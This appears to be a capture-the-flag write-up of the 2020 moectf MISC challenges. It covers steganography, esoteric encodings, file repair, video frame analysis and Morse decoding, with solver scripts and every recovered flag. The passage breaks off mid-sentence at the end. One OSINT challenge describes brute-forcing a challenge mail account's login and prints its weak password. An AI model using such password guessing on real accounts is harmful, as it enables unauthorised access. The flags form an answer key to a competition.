fxck you!</h3><img src="/images/2020moectf-MISC/image-20201007200240371.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007200240371.png" srcset="" alt="image-20201007200240371" style="zoom:67%;"><p>The download is an image:</p><img src="/images/2020moectf-MISC/good_morning_my_neighbors (1).png" class="lazyload" data-srcset="/images/2020moectf-MISC/good_morning_my_neighbors (1).png" srcset="" style="zoom:50%;"><p>Blind guess: image steganography. Run binwalk on it:<img src="/images/2020moectf-MISC/image-20201007200451400.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007200451400.png" srcset="" alt="image-20201007200451400"><br>and out comes this odd string</p><blockquote><p>++++++++[>>++>++++>++++++>++++++++>++++++++++>++++++++++++>++++++++++++++>++++++++++++++++>++++++++++++++++++>++++++++++++++++++++>++++++++++++++++++++++>++++++++++++++++++++++++>++++++++++++++++++++++++++>++++++++++++++++++++++++++++>++++++++++++++++++++++++++++++<<<<<<<<<<<<<<<<-]>>>>>>>>---.++.<+++++.--.>+++++.<+++.>>-----.--.<<-.>-.<<<<<+.>>>>>>.<<.>.<<<<<.>>>>+.+++++.------------.<+++++.>.<<<++.<.>>>>>>++++.</p></blockquote><p>Given the challenge name and some experience (a good search would find it too), this encoding is Brainfuck; an online interpreter finishes it<img src="/images/2020moectf-MISC/image-20201007201623970.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007201623970.png" srcset="" alt="image-20201007201623970" style="zoom:50%;"></p><blockquote><p>moectf{yes!yes!fk_U_2!}</p></blockquote><h3 id="Base64?¿"><a href="#Base64?¿" class="headerlink" title="Base64?¿"></a>Base64?¿</h3><img src="/images/2020moectf-MISC/image-20201007201728209.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007201728209.png" srcset="" alt="image-20201007201728209" style="zoom:67%;"><p>Opened the hint right away:</p><blockquote><p>vwxrstuopq34567ABCDEFGHIJyz012PQRSTKLMNOZabcdUVWXYefghijklmn89+/</p></blockquote><p>OK, Base64 with a custom alphabet; script time:</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line">import base64</span><br><span class="line"></span><br><span class="line">str1 = "0H9MJjCNPiMgJHMQJNtfyEJgIjtS1Ig="  # ciphertext</span><br><span class="line"></span><br><span class="line">string1 = "vwxrstuopq34567ABCDEFGHIJyz012PQRSTKLMNOZabcdUVWXYefghijklmn89+/"  # custom alphabet from the hint</span><br><span class="line">string2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"  # standard Base64 alphabet</span><br><span class="line"></span><br><span class="line"># Map each custom-alphabet character back to the standard one, then decode normally.</span><br><span class="line">print(base64.b64decode(str1.translate(str.maketrans(string1, string2))).decode())</span><br></pre></td></tr></table></figure><blockquote><p>moectf{itai_base64_qaq}</p></blockquote><h3 id="Pseudo-Encryption"><a href="#Pseudo-Encryption" class="headerlink" title="Pseudo Encryption"></a>Pseudo Encryption</h3><img src="/images/2020moectf-MISC/image-20201007205858294.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007205858294.png" srcset="" alt="image-20201007205858294" style="zoom:67%;"><p>This challenge was buggy at first.</p><h4 id="bug版"><a href="#bug版" class="headerlink" title="bug版"></a>Buggy version</h4><p>The download is a zip that asks for a password on extraction, and the pseudo-encryption trick does not bypass it. With no better idea I opened it in WinHex and found this string:</p><p><img src="/images/2020moectf-MISC/image-20201007210049127.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007210049127.png" srcset="" alt="image-20201007210049127"></p><p>Obviously Base64; decode it online, and the result is clearly URL-encoded.</p><h4 id="正确版"><a href="#正确版" class="headerlink" title="正确版"></a>Fixed version</h4><p>The download is a zip, but it won't open:</p><p><img src="/images/2020moectf-MISC/image-20201007210421836.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007210421836.png" srcset="" alt="image-20201007210421836"></p><p>In UltraEdit the file header turns out to be wrong; patch in the correct header.</p><p><img src="/images/2020moectf-MISC/image-20201007210523877.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007210523877.png" srcset="" alt="image-20201007210523877"></p><p>It then extracts to an image</p><p><img src="/images/2020moectf-MISC/flag.jpg" class="lazyload" data-srcset="/images/2020moectf-MISC/flag.jpg" srcset=""></p><p>From here it is the same as the buggy version</p><blockquote><p>Ciphertext: bW9lY3RmJTdCSnVzN19jNmFuOWVfQF9iMXQlMjElN0Q=</p><p>Decoded: moectf%7BJus7_c6an9e_@_b1t%21%7D </p><p>URL-decoded: moectf{Jus7_c6an9e_@_b1t!}</p></blockquote><h3 id="不-会-吧-?-就-这-¿"><a href="#不-会-吧-?-就-这-¿" class="headerlink" title="不 会 吧 ? 就 这 ¿"></a>Seriously? That's It¿</h3><img src="/images/2020moectf-MISC/image-20201007203957662.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007203957662.png" srcset="" alt="image-20201007203957662" style="zoom:67%;"><p>A sarcastic-sounding encoding...</p><p>The attachment is this cat-head image</p><p>Extract with binwalk:</p><p><img src="/images/2020moectf-MISC/image-20201007211144714.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007211144714.png" srcset="" alt="image-20201007211144714"></p><p>It must be some encoding; treat the two symbols as 0 and 1. With only two kinds of content it is either binary or Morse. Morse doesn't work, so it is binary mapped to ASCII. I wrote a C++ program for that:</p><figure class="highlight c++"><table><tr><td class="code"><pre><span class="line">#include<bits/stdc++.h></span><br><span class="line">using namespace std;</span><br><span class="line">int main()</span><br><span class="line">{</span><br><span class="line">    string flag;</span><br><span class="line">    // One token per character; a token starting with '#' (or end of input) stops the loop.</span><br><span class="line">    while(true)</span><br><span class="line">    {</span><br><span class="line">        string a;</span><br><span class="line">        if(!(cin>>a) || a[0]=='#')</span><br><span class="line">            break;</span><br><span class="line">        int ans=0;</span><br><span class="line">        // Each '.' is a set bit; the first character of the token is the least significant bit.</span><br><span class="line">        for(int i=0;i<a.size();i++)</span><br><span class="line">            if(a[i]=='.')</span><br><span class="line">                ans+=(1<<i);</span><br><span class="line">        char rel=ans;</span><br><span class="line">        //cout<<ans<<" : "<<rel<<"\n";</span><br><span class="line">        flag+=rel; // append; indexing into a fixed 1-char string would write out of bounds</span><br><span class="line">    }</span><br><span class="line">    cout<<flag;</span><br><span class="line">    return 0;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Feed it the converted content and the answer comes out~~</p><p><img src="/images/2020moectf-MISC/image-20201007221949248.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007221949248.png" srcset="" alt="image-20201007221949248"></p><blockquote><p>moectf{Y0u_wh4t?-0n1y_th1S?}</p></blockquote><h3 id="Cor1e的支票"><a href="#Cor1e的支票" class="headerlink" title="Cor1e的支票"></a>Cor1e's Cheque</h3><img src="/images/2020moectf-MISC/image-20201007222055487.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007222055487.png" srcset="" 
alt="image-20201007222055487" style="zoom:67%;"><p>The attachment opens to this:</p><blockquote><p>。。。。。。。。。。。。。。。。。。。。!?!!。?。。。。。。。。。。。。。。。。。。。。?。?!。?。。。。。。。。。。。。。。。。。。!。。。。。!。?。。。。。。。!?!!。?!!!!!!?。?!。?!!!。!!!!!。?。。。。。。。。。!?!!。?。。。。。。。。?。?!。?。。!。?。。。。。。。!?!!。?!!!!!!?。?!。?!!!!!!!!!!!。?。。。。。。。。。!?!!。?。。。。。。。。?。?!。?。。。。。。。。。。!。?。。。。。。。。。!?!!。?!!!!!!!!?。?!。?!!!!!!!!!!!!!!!!!。?。。。。。。。!?!!。?。。。。。。?。?!。?。。。。。。!。。。。。。。!。?。。。。。。。。。。。。。。。。。!?!!。?!!!!!!!!!!!!!!!!?。?!。?!!!。?。。。。。。。。。。。。。。。!?!!。?。。。。。。。。。。。。。。?。?!。?。。。。。。!。!!!!!!!!!!!!!。?。。。。。。。。。。。!?!!。?!!!!!!!!!!?。?!。?!!!!!!!!!!!。?。。。。。。。。。。。。。!?!!。?。。。。。。。。。。。。?。?!。?。。。。。。。。。。。。。。。。。。!。?。。。。。。。。。。。。。!?!!。?!!!!!!!!!!!!?。?!。?!!!!!!!!!!!!!。?。。。。。。。。。。。!?!!。?。。。。。。。。。。?。?!。?。。。。!。。。。。。。。。。。。。!。?。。。。。。。。。。。。。。。!?!!。?!!!!!!!!!!!!!!?。?!。?!!!。?。。。。。。。。。。。。。。。!?!!。?。。。。。。。。。。。。。。?。?!。?。。。。。。。。。。。。。。。。。。。。。。。。。。!。!!!!!!!!!!!!!!!!!。!!!!!!!!!。!!!!!!!!!!!!!。?。。。。。。。。。。。。。!?!!。?!!!!!!!!!!!!?。?!。?!!!!!!!!!!!!!!!!!!!!!。?。。。。。。。。。。。。。。。。。!?!!。?。。。。。。。。。。。。。。。。?。?!。?。。。。!。?。。。。。。。。。!?!!。?!!!!!!!!?。?!。?!!!!!!!!!。?。。。。。。。。。。。!?!!。?!!!!!!!!!!?。?!。?!!!!!!!。?。。。。。。。!?!!。?。。。。。。?。?!。?。。。。。。。。!。?。。。。。。。。。。。。。!?!!。?。。。。。。。。。。。。?。?!。?。。。。。。。。。。。。。。。。。。!。?。</p></blockquote><p>Hmm... it must be an encoding. Some searching turned up an encoding called Ook, from the same author as the Brainfuck seen earlier; add the Ook prefix to the tokens and decode online:</p><blockquote><p>moectf{cor1e_AnD_e3qie_1s_CP}</p><p>Inner monologue: #<em>?!</em>#$@?@**!@%#%^&@%@# </p></blockquote><h3 id="简单的社工题目"><a href="#简单的社工题目" class="headerlink" title="简单的社工题目"></a>A Simple OSINT Challenge</h3><img src="/images/2020moectf-MISC/image-20201007223009055.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201007223009055.png" srcset="" alt="image-20201007223009055" style="zoom:67%;"><p>This one is nasty.</p><img src="/images/2020moectf-MISC/3.jpg" class="lazyload" data-srcset="/images/2020moectf-MISC/3.jpg" srcset="" style="zoom: 33%;"><img src="/images/2020moectf-MISC/1.jpg" class="lazyload" data-srcset="/images/2020moectf-MISC/1.jpg" srcset="" style="zoom: 33%;"><img src="/images/2020moectf-MISC/2.jpg" class="lazyload" data-srcset="/images/2020moectf-MISC/2.jpg" srcset="" style="zoom: 33%;"><p>In the third image, read the account he follows backwards: <a href="mailto:923431@ourmail.cn">923431@ourmail.cn</a>. Logging in needs a password; I brute-forced it, but it is simply a weak password: a123456. Inside there is a mysterious string:<img src="/images/2020moectf-MISC/image-20201008004540729.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008004540729.png" srcset="" alt="image-20201008004540729"></p><p>and below it this:<img src="/images/2020moectf-MISC/image-20201008004740017.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008004740017.png" srcset="" alt="image-20201008004740017"></p><p>Blind guess: a Baidu Netdisk share (I did open the hint). That gives the flag.</p><h3 id="A3FXCK"><a href="#A3FXCK" class="headerlink" title="A3FXCK"></a>A3FXCK</h3><img src="/images/2020moectf-MISC/image-20201008004931193.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008004931193.png" srcset="" alt="image-20201008004931193" style="zoom:67%;"><p>The download is an image; binwalk it!!!</p><p><img src="/images/2020moectf-MISC/image-20201008005211185.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008005211185.png" srcset="" alt="image-20201008005211185"></p><p>which reveals this:</p><blockquote><p>luoq1an -> 1 ->[</p><p>arttnba2 -> 2 ->]</p><p>arttnba3 -> 3 ->(</p><p>luoqi4n -> 4 ->)</p><p>arttnba5 -> 5 -> +</p><p>arttnba6 -> 6 -> !</p></blockquote><p>After substituting, the six symbols []()+! together with the challenge description identify it as JSFuck; evaluate it in the browser console or decode it online:</p><blockquote><p>moectf{J5Fxck_1s_1nt3res7in9!}</p></blockquote><h3 id="⑨的完美教室"><a href="#⑨的完美教室" class="headerlink" title="⑨的完美教室"></a>⑨'s Perfect Classroom</h3><img src="/images/2020moectf-MISC/image-20201008005851888.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008005851888.png" srcset="" alt="image-20201008005851888" style="zoom: 67%;"><p>I think this one is truly evil.</p><p>There is an nc address, so connect:<img src="/images/2020moectf-MISC/image-20201008010003791.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008010003791.png" srcset="" alt="image-20201008010003791"></p><p>???</p><p>Bad at math???</p><p>Then I found that entering 9 over and over is accepted without any problem</p><p>I was baffled, and even looked up the anime character.....</p><p>Only after opening the hint did I learn that this is effectively a pwn challenge</p><p><img src="/images/2020moectf-MISC/image-20201008010246041.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008010246041.png" srcset="" alt="image-20201008010246041"></p><p><img src="/images/2020moectf-MISC/image-20201008010211135.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008010211135.png" srcset="" alt="image-20201008010211135"></p><p>Ugh, this challenge.</p><p>Script:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *</span><br><span class="line"># Challenge service from the original post; answer every prompt with 9 until the flag appears</span><br><span class="line">p = remote('sec.arttnba3.cn', 10001)</span><br><span class="line">while True:</span><br><span class="line">    recv = p.recv()</span><br><span class="line">    p.sendline(b'9')</span><br><span class="line">    if b'ctf' in recv:</span><br><span class="line">        print(recv)</span><br><span class="line">        break</span><br></pre></td></tr></table></figure><p>Shout-out to a certain evil challenge author</p><p><img src="/images/2020moectf-MISC/[email protected]" class="lazyload" data-srcset="/images/2020moectf-MISC/[email protected]" srcset="" alt="img"></p><blockquote><p>moectf{c1rn0_1s_tH3_5tr0n9est!}</p></blockquote><h3 id="停不下来了啊啊啊啊啊啊啊"><a href="#停不下来了啊啊啊啊啊啊啊" class="headerlink" title="停不下来了啊啊啊啊啊啊啊"></a>Can't Stop Aaaaaaah</h3><img src="/images/2020moectf-MISC/image-20201008010802177.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008010802177.png" srcset="" alt="image-20201008010802177" style="zoom:67%;"><p>This one is hilarious.</p><p>The download is a video: some singing, then just "aaaaah~~".</p><p>Suddenly a dark frame flashes by. Hmm? Was that a flag? Dropping it into Premiere and stepping through frame by frame: there it is!!!</p><p><img src="/images/2020moectf-MISC/image-20201008011031442.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008011031442.png" srcset="" alt="image-20201008011031442"></p><p>Only a fragment, but at least the approach is right. Then I checked the total length: 4 hours. Instant despair.</p><p>To be fair, the hint is very helpful: download ffmpeg and detect black frames. It took a long search to find the usage:</p><blockquote><p>$ ffmpeg -loglevel info -i final.mp4 -vf blackframe=95:30 -f null -</p></blockquote><p>Copy the results out:</p><p><img src="/images/2020moectf-MISC/image-20201008011320422.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008011320422.png" srcset="" alt="image-20201008011320422"></p><p>One problem: the black frames here are reported as timestamps (I could not find a way to display frame numbers or times directly), so I had to work from those. The video runs at 30 fps, so timestamp / frame rate gives seconds; convert that to a time and scan around it bit by bit (still "aaah~~" the whole way). Finally, like collecting all the Dragon Balls and summoning the dragon (not really), I got the flag.</p><blockquote><p>moectf{G0d_Of-Vid3o+Edit1ng_AnD_ffmp3G}</p></blockquote><h3 id="星空"><a href="#星空" class="headerlink" title="星空"></a>Starry Sky</h3><img src="/images/2020moectf-MISC/image-20201008012931570.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008012931570.png" srcset="" alt="image-20201008012931570" style="zoom:67%;"><p>The download unpacks to an image; binwalk extracts 420 images from it... so this is testing a skill from before I was five: jigsaw puzzles. Doing it by hand would be beneath me (honestly, impossible), so this needs a tool: gaps. Its environment is hard to set up (Windows is awful...).</p><p>I installed it in my VM, first used montage to tile the pieces into one image, then let gaps solve the puzzle:</p><blockquote><p>montage *jpg -geometry 100x100+0+0 out2.jpg</p><p>gaps --image out2.jpg --generations 2000 --population 420 --size 100</p></blockquote><p>None of the commands in the GitHub README worked at the time (terrible README), so I searched for ages and tuned the parameters by hand.</p><p>No matter how I tweaked the parameters the puzzle was never perfect; this is the best result:</p><p><img src="/images/2020moectf-MISC/sky.png" class="lazyload" data-srcset="/images/2020moectf-MISC/sky.png" srcset=""></p><p>Luckily I am not an e-sports player:</p><blockquote><p>moectf{thE_5t@rrY_sKy_1s_ReAlly_beauTifuL}</p></blockquote><h3 id="Osu-Master"><a href="#Osu-Master" class="headerlink" title="Osu! Master!"></a>Osu! Master!</h3><img src="/images/2020moectf-MISC/image-20201008014757932.png" class="lazyload" data-srcset="/images/2020moectf-MISC/image-20201008014757932.png" srcset="" alt="image-20201008014757932" style="zoom:67%;"><p>I played osu! before, but I was terrible, so I uninstalled it; I reinstalled it for this challenge.</p><p>The attachment is an osu! beatmap. Playing it, a black moectf flag blinks on the map: blind guess, Morse. But transcribing it by hand is hard. Under RX's guidance I learned the osu! storyboard file structure: the .osb file holds the timing parameters for the blinking image. Extracting them, the image stays visible for 270 or 540 ms and the gaps between are 270 or 810 ms, so I dumped all the timestamps by hand and wrote a Python script to turn them into Morse:</p><figure class="highlight python"><table><tr><td class="code"><pre><span class="line">def change(a,b):</span><br><span class="line">    # consecutive timestamps 270 ms apart are a dot; any other gap is a dash</span><br><span class="line">    if(b-a==270):</span><br><span class="line">        return '.'</span><br><span class="line">    else:</span><br><span class="line">        return '-'</span><br><span class="line">dic=[<span class="number">2133</span>,<span class="number">2673</span>,<span class="number">2943</span>,<span class="number">3213</span>,<span class="number">3483</span>,<span class="number">4023</span>,<span 
class="number">4293</span>,<span class="number">4833</span>,<span class="number">5643</span>,<span class="number">6183</span>,<span class="number">6453</span>,<span class="number">6993</span>,<span class="number">7263</span>,<span class="number">7803</span>,<span class="number">8613</span>,<span class="number">8883</span>,<span class="number">9153</span>,<span class="number">9423</span>,<span class="number">9693</span>,<span class="number">10233</span>,<span class="number">11043</span>,<span class="number">11313</span>,<span class="number">11583</span>,<span class="number">12123</span>,<span class="number">12933</span>,<span class="number">13203</span>,<span class="number">13473</span>,<span class="number">14013</span>,<span class="number">14283</span>,<span class="number">14553</span>,<span class="number">15363</span>,<span class="number">15633</span>,<span class="number">16443</span>,<span class="number">16983</span>,<span class="number">17253</span>,<span class="number">17793</span>,<span class="number">18063</span>,<span class="number">18603</span>,<span class="number">19413</span>,<span class="number">19683</span>,<span class="number">19953</span>,<span class="number">20223</span>,<span class="number">20493</span>,<span class="number">20763</span>,<span class="number">21573</span>,<span class="number">21843</span>,<span class="number">22113</span>,<span class="number">22383</span>,<span class="number">22653</span>,<span class="number">23193</span>,<span class="number">24003</span>,<span class="number">24543</span>,<span class="number">24813</span>,<span class="number">25353</span>,<span class="number">26163</span>,<span class="number">26433</span>,<span class="number">26703</span>,<span class="number">27243</span>,<span class="number">28053</span>,<span class="number">28323</span>,<span class="number">28593</span>,<span class="number">28863</span>,<span class="number">29133</span>,<span class="number">29403</span>,<span class="number">30213</span>,<span 
class="number">30753</span>,<span class="number">31563</span>,<span class="number">31833</span>,<span class="number">32643</span>,<span class="number">32913</span>,<span class="number">33183</span>,<span class="number">33723</span>,<span class="number">33993</span>,<span class="number">34263</span>,<span class="number">35073</span>,<span class="number">35343</span>,<span class="number">35613</span>,<span class="number">35883</span>,<span class="number">36153</span>,<span class="number">36423</span>,<span class="number">37233</span>,<span class="number">37773</span>,<span class="number">38043</span>,<span class="number">38583</span>,<span class="number">38853</span>,<span class="number">39393</span>,<span class="number">40203</span>,<span class="number">40473</span>,<span class="number">40743</span>,<span class="number">41013</span>,<span class="number">41283</span>,<span class="number">41553</span>,<span class="number">42363</span>,<span class="number">42903</span>,<span class="number">43173</span>,<span class="number">43713</span>,<span class="number">43983</span>,<span class="number">44523</span>,<span class="number">45333</span>,<span class="number">45603</span>,<span class="number">45873</span>,<span class="number">46143</span>,<span class="number">46413</span>,<span class="number">46683</span>,<span class="number">47493</span>,<span class="number">48033</span>,<span class="number">48843</span>,<span class="number">49113</span>,<span class="number">49383</span>,<span class="number">49923</span>,<span class="number">50193</span>,<span class="number">50463</span>,<span class="number">51273</span>,<span class="number">51813</span>,<span class="number">52083</span>,<span class="number">52623</span>,<span class="number">52893</span>,<span class="number">53433</span>,<span class="number">54243</span>,<span class="number">54783</span>,<span class="number">55053</span>,<span class="number">55323</span>,<span class="number">56133</span>,<span 
class="number">56673</span>,<span class="number">56943</span>,<span class="number">57483</span>,<span class="number">57753</span>,<span class="number">58023</span>,<span class="number">58833</span>,<span class="number">59373</span>,<span class="number">60183</span>,<span class="number">60453</span>,<span class="number">60723</span>,<span class="number">60993</span>,<span class="number">61263</span>,<span class="number">61533</span>,<span class="number">61803</span>,<span class="number">62073</span>,<span class="number">62883</span>,<span class="number">63153</span>,<span class="number">63423</span>,<span class="number">63693</span>,<span class="number">64503</span>,<span class="number">64773</span>,<span class="number">65043</span>,<span class="number">65313</span>,<span class="number">65583</span>,<span class="number">65853</span>,<span class="number">66663</span>,<span class="number">66933</span>,<span class="number">67203</span>,<span class="number">67473</span>,<span class="number">67743</span>,<span class="number">68283</span>,<span class="number">68553</span>,<span class="number">68823</span>,<span class="number">69633</span>,<span class="number">69903</span>,<span class="number">70173</span>,<span class="number">70713</span>,<span class="number">70983</span>,<span class="number">71253</span>,<span class="number">71523</span>,<span class="number">71793</span>,<span class="number">72603</span>,<span class="number">72873</span>,<span class="number">73143</span>,<span class="number">73683</span>,<span class="number">74493</span>,<span class="number">75033</span>,<span class="number">75303</span>,<span class="number">75843</span>,<span class="number">76113</span>,<span class="number">76383</span>,<span class="number">77193</span>,<span class="number">77733</span>,<span class="number">78003</span>,<span class="number">78543</span>,<span class="number">78813</span>,<span class="number">79083</span>,<span class="number">79893</span>,<span 
class="number">80163</span>,<span class="number">80433</span>,<span class="number">80703</span>,<span class="number">81513</span>,<span class="number">81783</span>,<span class="number">82053</span>,<span class="number">82323</span>,<span class="number">82593</span>,<span class="number">82863</span>,<span class="number">83133</span>,<span class="number">83673</span>,<span class="number">84483</span>,<span class="number">84753</span>,<span class="number">85563</span>,<span class="number">86103</span>,<span class="number">86373</span>,<span class="number">86643</span>,<span class="number">86913</span>,<span class="number">87453</span>,<span class="number">87723</span>,<span class="number">88263</span>,<span class="number">89073</span>,<span class="number">89613</span>,<span class="number">89883</span>,<span class="number">90423</span>,<span class="number">90693</span>,<span class="number">91233</span>,<span class="number">92043</span>,<span class="number">92313</span>,<span class="number">92583</span>,<span class="number">92853</span>,<span class="number">93123</span>,<span class="number">93663</span>,<span class="number">94473</span>,<span class="number">95013</span>,<span class="number">95823</span>,<span class="number">96363</span>,<span class="number">96633</span>,<span class="number">97173</span>,<span class="number">97443</span>,<span class="number">97983</span>,<span class="number">98793</span>,<span class="number">99063</span>,<span class="number">99333</span>,<span class="number">99873</span>,<span class="number">100143</span>,<span class="number">100413</span>,<span class="number">101223</span>,<span class="number">101493</span>,<span class="number">102303</span>,<span class="number">102573</span>,<span class="number">102843</span>,<span class="number">103383</span>,<span class="number">103653</span>,<span class="number">104193</span>,<span class="number">105003</span>,<span class="number">105273</span>,<span class="number">105543</span>,<span 
class="number">106083</span>,<span class="number">106893</span>,<span class="number">107163</span>,<span class="number">107433</span>,<span class="number">107973</span>,<span class="number">108243</span>,<span class="number">108513</span>,<span class="number">109323</span>,<span class="number">109863</span>,<span class="number">110133</span>,<span class="number">110403</span>,<span class="number">110673</span>,<span class="number">110943</span>,<span class="number">111753</span>,<span class="number">112293</span>,<span class="number">112563</span>,<span class="number">112833</span>,<span class="number">113103</span>,<span class="number">113643</span>,<span class="number">113913</span>,<span class="number">114453</span>,<span class="number">115263</span>,<span class="number">115803</span>,<span class="number">116073</span>,<span class="number">116613</span>,<span class="number">116883</span>,<span class="number">117423</span>,<span class="number">118233</span>,<span class="number">118503</span>,<span class="number">118773</span>,<span class="number">119043</span>,<span class="number">119313</span>,<span class="number">119853</span>,<span class="number">120663</span>,<span class="number">121203</span>,<span class="number">121473</span>,<span class="number">121743</span>,<span class="number">122013</span>,<span class="number">122283</span>,<span class="number">123093</span>,<span class="number">123633</span>,<span class="number">123903</span>,<span class="number">124443</span>,<span class="number">124713</span>,<span class="number">125253</span>,<span class="number">126063</span>,<span class="number">126603</span>,<span class="number">126873</span>,<span class="number">127143</span>,<span class="number">127953</span>,<span class="number">128493</span>,<span class="number">128763</span>,<span class="number">129303</span>,<span class="number">129573</span>,<span class="number">130113</span>,<span class="number">130923</span>,<span class="number">131463</span>,<span 
class="number">132273</span>,<span class="number">132543</span>,<span class="number">132813</span>,<span class="number">133353</span>,<span class="number">134163</span>,<span class="number">134433</span>,<span class="number">134703</span>,<span class="number">134973</span>,<span class="number">135243</span>,<span class="number">135783</span>,<span class="number">136053</span>,<span class="number">136323</span>,<span class="number">137133</span>,<span class="number">137403</span>,<span class="number">137673</span>,<span class="number">138213</span>,<span class="number">138483</span>,<span class="number">138753</span>,<span class="number">139563</span>,<span class="number">139833</span>,<span class="number">140103</span>,<span class="number">140643</span>,<span class="number">141453</span>,<span class="number">141723</span>,<span class="number">141993</span>,<span class="number">142263</span>,<span class="number">143073</span>,<span class="number">143613</span>,<span class="number">143883</span>,<span class="number">144153</span>,<span class="number">144423</span>,<span class="number">144693</span>,<span class="number">145503</span>,<span class="number">146043</span>,<span class="number">146313</span>,<span class="number">146853</span>,<span class="number">147123</span>,<span class="number">147663</span>,<span class="number">148473</span>,<span class="number">148743</span>,<span class="number">149013</span>,<span class="number">149283</span>,<span class="number">149553</span>,<span class="number">150093</span>,<span class="number">150363</span>,<span class="number">150633</span>,<span class="number">151443</span>,<span class="number">151713</span>,<span class="number">151983</span>,<span class="number">152253</span>,<span class="number">153063</span>,<span class="number">153603</span>,<span class="number">154413</span>,<span class="number">154683</span>,<span class="number">154953</span>,<span class="number">155223</span>,<span class="number">155493</span>,<span 
class="number">155763</span>,<span class="number">156573</span>,<span class="number">156843</span>,<span class="number">157113</span>,<span class="number">157653</span>,<span class="number">157923</span>,<span class="number">158193</span>,<span class="number">158463</span>,<span class="number">158733</span>,<span class="number">159543</span>,<span class="number">159813</span>,<span class="number">160623</span>,<span class="number">161163</span>,<span class="number">161433</span>,<span class="number">161703</span>,<span class="number">162513</span>,<span class="number">163053</span>,<span class="number">163323</span>,<span class="number">163863</span>,<span class="number">164133</span>,<span class="number">164403</span>,<span class="number">165213</span>,<span class="number">165753</span>,<span class="number">166563</span>,<span class="number">166833</span>,<span class="number">167103</span>,<span class="number">167373</span>,<span class="number">167643</span>,<span class="number">167913</span>,<span class="number">168183</span>,<span class="number">168453</span>,<span class="number">169263</span>,<span class="number">169533</span>,<span class="number">169803</span>,<span class="number">170073</span>,<span class="number">170883</span>,<span class="number">171423</span>,<span class="number">172233</span>,<span class="number">172503</span>,<span class="number">172773</span>,<span class="number">173043</span>,<span class="number">173853</span>,<span class="number">174123</span>,<span class="number">174393</span>,<span class="number">174663</span>,<span class="number">174933</span>,<span class="number">175203</span>,<span class="number">176013</span>,<span class="number">176553</span>,<span class="number">177363</span>,<span class="number">177633</span>,<span class="number">177903</span>,<span class="number">178173</span>,<span class="number">178443</span>,<span class="number">178713</span>,<span class="number">178983</span>,<span class="number">179253</span>,<span 
class="number">180063</span>,<span class="number">180333</span>,<span class="number">181143</span>,<span class="number">181413</span>,<span class="number">181683</span>,<span class="number">182223</span>,<span class="number">182493</span>,<span class="number">182763</span>,<span class="number">183573</span>,<span class="number">183843</span>,<span class="number">184113</span>,<span class="number">184383</span>,<span class="number">185193</span>,<span class="number">185733</span>,<span class="number">186003</span>,<span class="number">186543</span>,<span class="number">186813</span>,<span class="number">187083</span>,<span class="number">187893</span>,<span class="number">188163</span>,<span class="number">188433</span>,<span class="number">188703</span>,<span class="number">188973</span>,<span class="number">189243</span>,<span class="number">189513</span>,<span class="number">189783</span>,<span class="number">190593</span>,<span class="number">191133</span>,<span class="number">191943</span>,<span class="number">192213</span>,<span class="number">192483</span>,<span class="number">192753</span>,<span class="number">193023</span>,<span class="number">193563</span>,<span class="number">193833</span>,<span class="number">194103</span>,<span class="number">194913</span>,<span class="number">195183</span>,<span class="number">195453</span>,<span class="number">195993</span>,<span class="number">196263</span>,<span class="number">196533</span>,<span class="number">196803</span>,<span class="number">197073</span>,<span class="number">197883</span>,<span class="number">198153</span>,<span class="number">198423</span>,<span class="number">198963</span>,<span class="number">199773</span>,<span class="number">200313</span>,<span class="number">200583</span>,<span class="number">201123</span>,<span class="number">201393</span>,<span class="number">201663</span>]</span><br><span class="line">cnt = <span class="number">2</span></span><br><span 
class="line">print(change(dic[<span class="number">0</span>],dic[<span class="number">1</span>]),end=<span class="string">''</span>)</span><br><span class="line"><span class="keyword">while</span> cnt<<span class="built_in">len</span>(dic):</span><br><span class="line">    <span class="keyword">if</span> dic[cnt]-dic[cnt-<span class="number">1</span>]==<span class="number">810</span>:</span><br><span class="line">        print(<span class="string">'/'</span>,end=<span class="string">''</span>)</span><br><span class="line">    print(change(dic[cnt],dic[cnt+<span class="number">1</span>]),end=<span class="string">''</span>)</span><br><span class="line">    cnt=cnt+<span class="number">2</span></span><br><span class="line"><span class="comment"># result: -.--/---/..-/.-/.-././---/.../..-/--/.-/.../-/./.-./.../---/.../---/.../-/.-./---/-./--./-/..../../.../..-./.-../.-/--./--./../...-/./-.--/---/..-/-/---/.-././.--/.-/.-./-../-.--/---/..-/-../---/-./---/-/.-/..-./.-./.-/../-../---/..-./../-/.../.-.././-./--./-/..../../-/../.../-/...././.-./../--./..../-/..-./.-../.-/--.</span></span><br></pre></td></tr></table></figure><p>Then decode the Morse with an online 